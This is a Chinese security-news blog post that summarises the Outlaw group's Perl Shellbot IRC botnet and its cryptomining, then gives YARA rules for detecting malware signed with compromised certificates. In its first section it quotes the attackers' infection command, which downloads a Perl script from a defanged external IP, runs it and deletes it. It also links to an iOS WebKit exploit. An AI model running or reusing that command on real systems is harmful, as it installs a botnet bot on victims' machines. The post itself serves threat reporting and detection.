Outlaw 黑客组织& VT 下证书类规则方法

释放双眼,带上耳机,听听看~!

今天困死了,明天好好搞一篇,日常链接哈哈哈

1、

Outlaw 黑客组织使用 Perl Shellbot 部署 IRC Bot 构建僵尸网络

该活动攻击了日本艺术机构的FTP服务器,以及对孟加拉国政府网站的Dovecot邮件服务器上的漏洞进行了攻击

之后开始进行各种命令执行。

僵尸网络本身是用Shellbot变体构建的,脚本用Perl编写,甚至可以在GitHub上使用。僵尸网络之前是通过利用Shellshock漏洞进行分发的,因此命名为“Shellbot”。这一次,主要通过暴力破解或受损主机进行分发。

主要感染主机方式,通过命令

“uname -a;cd /tmp;wget hxxp://54[.]37[.]72[.]170/n3;perl n3;rm -rf n3*”

之后进行痕迹抹除,随后使用irc进行僵尸网络通信。

毕竟是黑客团伙,少不了挖矿

root@ubuntu:~$ cat speed.sh
i=1
result=`docker ps -q | wc -l`
while [ “$i” -le “$result” ]
do
echo “miner numa $i speed”
docker logs minernuma$i | tail -8 | grep speed >> /tmp/minernuma$i.tmp
tail -1 /tmp/minernuma$i.tmp
rm /tmp/minernuma$i.tmp
i=$(($i + 1))
done

在IRC通信渠道中发现了诸如luci,lucian,dragos,mazy,hydra和poseidon等几个身份。


看这几个用户名,我觉得还是符合黑客常用的命名习惯的,可以入库日后溯源。

相关链接:

https://blog.trendmicro.com/trendlabs-security-intelligence/perl-based-shellbot-looks-to-target-organizations-via-cc/

2、

为被恶意软件利用或已撤销的证书创建 YARA 规则

yara规则

rule MAL_Compromised_Cert_Nov18_1 {
   meta:
      description = “Detects a compromised certificate of CORP 8 LIMITED – identified in November 2018”
      date = “2018-11-01”
      hash = “ee5340b2391fa7f8d6e22b32dcd48f8bfc1951c35491a1e2b4bb4ab2fcbd5cd4”
   condition:
      uint16(0) == 0x5a4d and
      for any i in (0 .. pe.number_of_signatures) : (
         pe.signatures[i].issuer contains “COMODO RSA Code Signing CA” and
         pe.signatures[i].serial == “4c:75:75:69:2c:2d:06:51:03:1a:77:ab:49:22:4c:cc”
      )
}

作为尊贵的VT Intelligence用户,可以使用下面的规则直接使用,嘻嘻嘻

rule Compromised_Certificate {
  condition:
    // New files, detected by more than 30 engines and revoked certificate 
   new_file and positives > 30 and tags contains “revoked-cert”
}


相关链接

https://www.nextron-systems.com/2018/11/01/short-tutorial-how-to-create-a-yara-rule-for-a-compromised-certificate/

安全资源:

a.HITB安全峰会PPT

https://conference.hitb.org/hitbsecconf2018pek/materials/

b.iOS 12.0.1 的 Webkit 远程代码执行漏洞利用 https://twitter.com/Yalujb/status/1058038352677625857 https://github.com/externalist/exploit_playground/tree/master/jsc_prop_enum_uaf

明天详细汇总一下韩国某篇文章,反正早发周末你们也不会处理,哈哈哈

顺带一提还有这个,以技术的角度看待。

https://twitter.com/eyalsela/status/1058059250788954115

本文源自微信公众号:黑鸟

人已赞赏
安全工具

文本编辑器Vim/Neovim被曝任意代码执行漏洞,Notepad:兄弟等你好久了

2019-10-16 10:11:43

安全工具

木曜日威胁情报:也门互联网争夺战/SamSam/污水/CAD

2019-10-16 10:11:50

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索